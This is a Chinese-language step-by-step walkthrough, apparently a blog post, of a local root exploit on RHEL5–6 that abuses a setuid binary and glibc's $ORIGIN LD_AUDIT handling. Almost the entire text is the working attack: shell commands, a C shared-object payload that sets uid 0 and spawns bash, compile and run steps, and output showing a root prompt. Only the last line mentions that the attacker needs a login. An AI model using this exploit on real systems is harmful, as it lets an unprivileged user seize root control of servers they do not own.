適用系統為RHEL5 ---- RHEL6
這個漏洞利用的是文件的特殊權限位,下面是過程
首先需要登錄系統,在/tmp目錄下創建任意目錄
[test@linux-6-node-1 tmp]$ ll -d /tmp/ drwxrwxrwt. 6 root root 4096 Sep 24 20:06 /tmp/ [test@linux-6-node-1 tmp]$ mkdir exploit [test@linux-6-node-1 tmp]$ ll -d exploit drwxrwxr-x. 2 gl gl 4096 Sep 24 20:31 exploit
link一個擁有suid的命令文件到新建目錄下
[test@linux-6-node-1 tmp]$ ll /bin/ping -rwsr-xr-x. 2 root root 38200 Jul 24 2015 /bin/ping [test@linux-6-node-1 tmp]$ ln /bin/ping /tmp/exploit/target [test@linux-6-node-1 tmp]$ ll !$ ll /bin/ping -rwsr-xr-x. 2 root root 38200 Jul 24 2015 /bin/ping
載入內存
[test@linux-6-node-1 tmp]$ exec 3< /tmp/exploit/target [test@linux-6-node-1 tmp]$ ll /proc/$$/fd/3 lr-x------. 1 gl gl 64 Sep 24 20:17 /proc/44429/fd/3 -> /tmp/exploit/target
刪除鏈接文件
[test@linux-6-node-1 tmp]$ rm -fr /tmp/exploit/ [test@linux-6-node-1 tmp]$ ll /proc/$$/fd/3 lr-x------. 1 gl gl 64 Sep 24 20:17 /proc/44429/fd/3 -> /tmp/exploit/target (deleted)
編寫C語言腳本,進行提權
[test@linux-6-node-1 tmp]$ vim payload.c
void __attribute__((constructor)) init()
{
setuid(0);
system("/bin/bash");
}
編譯腳本
[test@linux-6-node-1 tmp]$ gcc -w -fPIC -shared -o /tmp/exploit payload.c [test@linux-6-node-1 tmp]$ ll /tmp/exploit -rwxrwxr-x. 1 gl gl 6020 Sep 24 20:25 /tmp/exploit
執行腳本,進行提權
[test@linux-6-node-1 tmp]$ LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3
ERROR: ld.so: object '$ORIGIN' cannot be loaded as audit interface: cannot open shared object file; ignored.
Usage: ping [-LRUbdfnqrvVaA] [-c count] [-i interval] [-w deadline]
[-p pattern] [-s packetsize] [-t ttl] [-I interface or address]
[-M mtu discovery hint] [-S sndbuf]
[ -T timestamp option ] [ -Q tos ] [hop1 ...] destination
[root@linux-6-node-1 ~]#
可以看到命令提示符已經從$變為#,而#代表什么大家都懂的,用whoami看一下
[root@linux-6-node-1 ~]# whoami root
提權成功
這個不用很擔心,前提必須登錄服務器才能進行操作,平時安全做好,能避免這種情況。